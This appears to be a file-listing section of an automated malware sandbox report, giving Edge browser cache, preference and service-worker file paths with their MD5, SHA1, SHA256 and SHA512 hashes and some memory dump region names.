SHA512 94f045e71b9276944609ca69fc4b8704e4447f9b0fc2b80789cc012235895c50ef9ecb781a3ed901a0c989bed26caa37d4d4a9baffcce2cb19606dbb16a17176

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000036

MD5 ce6bda6643b662a41b9fb570bdf72f83
SHA1 87bcf1d2820b476aaeaea91dc7f6dbedd73c1cb8
SHA256 0adf4d5edbc82d28879fdfaaf7274ba05162ff8cbbda816d69ed52f1dae547f6
SHA512 8023da9f9619d34d4e5f7c819a96356485f73fddcb8adb452f3ceefa8c969c16ca78a8c8d02d8e7a213eb9c5bbe5c50745ba7602e0ee2fe36d2742fb3e979c86

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00003a

MD5 4f7c668ae0988bf759b831769bfd0335
SHA1 280a11e29d10bb78d6a5b4a1f512bf3c05836e34
SHA256 32d4c8dc451e11db315d047306feea0376fbdc3a77c0ab8f5a8ab154164734d1
SHA512 af959fe2a7d5f186bd79a6b1d02c69f058ecd52e60ebd0effa7f23b665a41500732ffa50a6e468a5253bb58644251586ae38ec53e21eab9140f1cf5fd291f6a5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 5f58327c6a39b2cc46483834b71a5f08
SHA1 75e4d3353a23f2ddffd9e2c704e9520a03cc5f16
SHA256 bf40acd4a59ec6d8014bad5456ad22a45a20fcadb802eb51a60dd5d3abf32a7c
SHA512 bdef7adb8f03cdda88237d98aad83eab8edd2d3f67cc98b4f83336fd945e01b4565ffc30205c8d6fa6f867386cacac342adfbc01dc3f1b7583e51c492d46c4fb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000052

MD5 f27687fbca8ddfdcad0c6ad389cb46b0
SHA1 413da23b384debb14518d839278dbe89aff8862f
SHA256 c6cedeaac255e23a53ecd9a53fa40a6c58e6c7a24f3c2aac79838ae3ba182e29
SHA512 928f9f5da9ceea95eef2bb6ea272e3b14f9066e893d789232137e94068121d5bbcfb49c1e41cb1a14376695236c055a2ecb03cd9aebe4c8665ab9c5adb849903

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 1e160f08efd249cb0db6e70d46f429de
SHA1 42db5f3737f9e83ce47acfb909fa45ec26202caa
SHA256 c1816b77f71539603e671f9aa10c05710c3b42124402f4337605784cd2edb3ae
SHA512 63e67811c3e94b8527994fd78dc615caa6dc4b8da4f8dd5610fd2d957c92ca54b3fcc31747f369c67456f21f0e5a16e6b0297043d81fecb0ffa3e2b56b348a15

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 9cd6132b2cbd5f971b0ba6bc0b3a2751
SHA1 0ec111cea842a7188459d0fbad51310cdb8433c1
SHA256 b46a8df5b98db1412c5ed69c20211d0b5c84978e0e13dbeeb8a1ea54e23e69e3
SHA512 45ae0cfe56f5888c4cc9266748a0f3bdc7577edb4182227aa28b162ee443edc589ec789aa70ab3a710bce0c24bd26e4519017849b1703bcff3819672ba704090

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\index.txt

MD5 7782447eadcece4ae54aad24e190821d
SHA1 5055324fe7d24b1bec6ff9f3b3b24a8002d4933a
SHA256 07a4d30bb0417db6e8913a2f36c2d088dca0a2289b34a769c3d4a636a913e3fb
SHA512 53251d17d15c08d43e46ae0ca470fcd0a82fd909f29d13556953c9d96c5ec222af1da5de7052a19cd0acbdd25b100c0ebbb18f34a4f33bd428255e8d16fab25e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\index.txt~RFe591459.TMP

MD5 01e9de6796c59fde781fe473c76d3755
SHA1 2cbc5160f233f481c001ed71ce1370fffc45262a
SHA256 fcec85f4505dff55249bbd5ebce3bcb7e3d0329c8ee815d92706ce6e642158fe
SHA512 d1447a44f93bfc965b675dbeeca1d8b88df4ef14d222a7ea4429864550dfc9bc1fb459eb9ea999ce64dedc90a4058b56243185a4f6827bb90033b7f7f080444a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\9f3af443-9998-4a49-8f30-16fdfcf3097d\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

memory/7700-2556-0x0000000000400000-0x00000000008DF000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001a

MD5 603b46a042ff004fa5b18b5e64a7c121
SHA1 d5edc542e336e7c4ecd7279b1d5e5666c7b00a31
SHA256 077ce9cdd14688ea70f9a22a75c6f97416213cc8b869a0b1d4de476403e6b8be
SHA512 a22e853dce127dfe6c0ca5401ca488ea4cd37011a19e32557cf5c2438b75b97ac62c7b1adc1acfb67c6a47e39979cd5c778413ddf6246a46835c7a2f7c69066f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 3249487c79bfc254f6093d22ad03b414
SHA1 ece6bbbf918a1c70467ac3c460f1956302a27f46
SHA256 342c56831046e2f0184bb091e75fb8a211c3ac20f3dace62a217ebc1cf1a4288
SHA512 e62680040c1c923a4abe614baf3df63c5ff8e4918cf7c95c8fa233827c4d123531aa0b791a55868b09eaa7f2752349dee810879a9ae49d0c5c0a5a348d45d786

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000060

MD5 1490acc6c189316c545989694777347d
SHA1 40d46c9364bcad6fa1f9e5eeeca1120e3124e903
SHA256 fe349cee3e127dc9754839d36e462abdb47db388502b0fe5c0132252d3bea75f
SHA512 4e34822f615e7c4a105ed9e1de727cb28b1bd349a14f1dc53313b473c25a50bbffba66d757747d8d0b201ede64d89d73dc918be7cb87614592f5720629cd76ba

memory/5548-2635-0x0000000000720000-0x00000000007CD000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001c

MD5 85122ab68ee0ec8f5b454edd14c86c41
SHA1 d1b1132e3054ff3cef157fea75f4502c34fa5e26
SHA256 4f5169675d35f59c99a0a4e41a52a0b79a86117a9244ac79dbb1e7cc13e0e9b5
SHA512 dae95ac0a262b0fc88302050c51158e11fd113c05efa351bee3213e75150181915a870e00ec0797ec994462ccd841c77215a7b7b0d02651d4757f03ba17274ca

memory/1868-2691-0x00007FF6A2A40000-0x00007FF6A2FE1000-memory.dmp

memory/4204-2692-0x0000000000FA0000-0x0000000000FC0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000063

MD5 3d2f4182c474d87c9d1fecf7af9f7082
SHA1 213a499d3f304b2015efb399a0faf08bc78c4306
SHA256 c243f4ab8abf11750a75121292f499ff77213c6c56c0aed0730f3cdf084036d9
SHA512 c22ece464abfc073c7f417b571fd534bcfbbb953b89c10e878bc74b2de671fed0e667a1abee380cf14c49680d2d9ce1d5ee920dc676d05e37965ad3e6348d1d9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000064

MD5 ab18a46f7c0b1a34b19d40d2198dbea0
SHA1 fe6fb562b7c2ce00e4fbefb140b0281631e03376
SHA256 27d2a2e22ff6476c72078311e9e1c58b1b72ec687f563b2d4f802f99e65afb12
SHA512 fdf94f4ad2923c1d4245279e1983e1e1ea3d6cc15793b9eedf79daf66ca44c5c4c78c04371b5a752906fe9c6975db36342f6e43ef457f28c67d3c81b8b9e8cab

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000066

MD5 67412b247e0ff9363d571537acb61e09
SHA1 e58351674fb43e8fec92c7258ebe25703fc708ad
SHA256 663d61f95733059cd6879a8d5f2fdc8b0a1705a3fd25d0ed013ae8f09e215666
SHA512 b193da22ca7fe981cd8e30107fc5d9b3007b3b91310bea0d41d379bc36421e83396364b5bb78676a3fff2f6909773438889cac231c31eef1d13e62f1b32e59b7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 d71ce5503405d61bfb888cd60b41fcf6
SHA1 eb6807ef1b218377c06f95b7ee0b9d7c9cdd8fb7
SHA256 86977c7a66252c35111d938f3ebd43f0b27ffc67570bc0abfc78d47488f16366
SHA512 9dbfd2598b1ebf1f993e65d5faf32fec3bb28c87cd58401f8552330f81efa7370f5cce385a659de530cd0c46fa5c3ffb2bf9f0e1bff2ee58d67477cb1e04ba21

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000062

MD5 3df01456ef7248b94ac7622830395b82
SHA1 f5c2d24e2e6981c214b731cdc4d10cccd3424c6d
SHA256 74218a640c8bff89436945d4cedf1d5bf213285458c36d626e8970c7149c0f93
SHA512 06ab8af0ad993243a3700282e1a6cb4d9a1ca221a6633359ecb85d32e8125b8344db0cdd757bb8d2b36bd54a53fd40a6e922ffba49fb40a60a50ce0aeb5bfb0c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00006f

MD5 ee32983357800a1c73ce1f62da083101
SHA1 467c2215d2bcc003516319be703bf52099303d3d
SHA256 173b1020764ed0b48e21882bb888025edc6560672f29fa3241712bf172e684cd
SHA512 45e9f3fb39f15066ecf6fb2711abc19586f3165c12f7d8adf9503bd51d31a50594e59cd4c02196491f11516b074e105e0409c4fe468e2f89f53582eff8932f3a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 587964f0c5170e314a3d5fd697c92a2d
SHA1 33d9b7e3ca1f4c579fc87165defabba6e9cd3f85
SHA256 d21d140268255cfdcb5926a780412f10b57fdaaabb198b77012e0f7ab504fe1f
SHA512 f0b62f2c397e68970712f098dd6b92e6c9949c1d0ae3d567a9ee17445c8c14acfc83cf89e8738aa0eb6fd2a77fa6bfe6a007b10c538c32be0342a95874d1bac8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00006e

MD5 e688630f33c2bb19a3dcc8638cc8add4
SHA1 d1c63d5727a4c00c4955dfb54bc7840c6dea3645
SHA256 81d1c12fa0fc944e0db257c8f9a23f603029532dc9226a8c416c64e56380db21
SHA512 885c48c8334a6ae4296692bb001470b7d2a04804e1265bd472b990eee3499785e97f5c9a8169a0a850261156492a6c9d56451998cf3e00911afbeb0cbb7a96f2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\a64d10da-4151-42de-b7ec-1c0cf9690339\index-dir\the-real-index

MD5 1e8853f248b92e30267f2e1a1ea14b9c
SHA1 e2bacc416ce3cd65fa05657c4cd80702f98e329d
SHA256 9dd9ae5dba742509011dcb0711b946f5438a26d0df9d1622bf887093959ee867
SHA512 1d9aecc4d29623bf2c8adcacf19a517bafdf43a890a9f0cab9474fb6fe9e4243883bdeb3f15b014540630630b95a7bb4c458abcecd23d231519ac8c88bd21d03

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\a64d10da-4151-42de-b7ec-1c0cf9690339\index-dir\the-real-index

MD5 7f123764074f3d7241d0dc455793d056
SHA1 07132630fd71043f9912a349cfa5a2e4976f7ba2
SHA256 e319eca988ce7aeea28c8b545542846332373a1194069fe523b7d8ad7c568f10
SHA512 fcde8f79aac0c8483754333b4513c42873b06fe425f0a1bdcdce56c9a5334174d349bc5c3500d4a5efb087472d1f2903a871e08d5883aedf34f83063d88a627f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 bbfede2f43e20061fd0b3b4df11952cb
SHA1 dd09fc17a286ac422a0be1b1551dea70e40ad87e
SHA256 07a3d8f90cb92a089893f09c6166e8a9309ed5a3394c89847fbd44826beb7259
SHA512 89b3820c91194509f8a02d350963443a7f5f5c397c1e951de069088fbe53814afd636fe2462fe73c9a620d4ec59738aa410454c5a1fb2559211b8a454aacbc99

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00004f

MD5 9e645b4b23682655733e89ea1e704ea0
SHA1 497a6c5681f09070b68dfa1650629229a86c0ebc
SHA256 f869ac57a67af5981dba5d231f659bd8872d929ff840377cbb06f52702d3b852
SHA512 f2b9571478d2f26cd2d8593d5c8c0fccc525f75b27b0dd24178c945d23b7a23c74ff341bcb55752307d46eab9ef33c93e80f9b7d1b57e01b2ab285cf9365b427

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 2f8c438b3bb8b06a7a33e8118d628475
SHA1 84906aa6e4ce168ead98116a631814a467a9f3fb
SHA256 ec5868759292d2d31f42d955e768c539c808cc0fa7832648305bc54877c1a66d
SHA512 73c5e42a6a2553e229538312eb9c6becb4630d4f01a6bcb1a27f9a5970dc8712d39bc80a2f8d6dcfbab3e6613397b75313257db6c314a0b9cee4caed26df8b2b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 a7469b898d68c757405cd4cbf6f120b2
SHA1 7e89155ec79988fd48e54e0c90b16c9f0e2cbb16
SHA256 0cfde5f746890addbb477c317f8e9091cfa17f9d0412b2bf61815306534cca49
SHA512 412a57543ff44301640d4304dcc52d56f19734ccba3fcbf7a0398cd133b6921d5bc183e0497254a2fcfdf396c34711594a76b5273a9ca2f1a54bbb81a64ef06f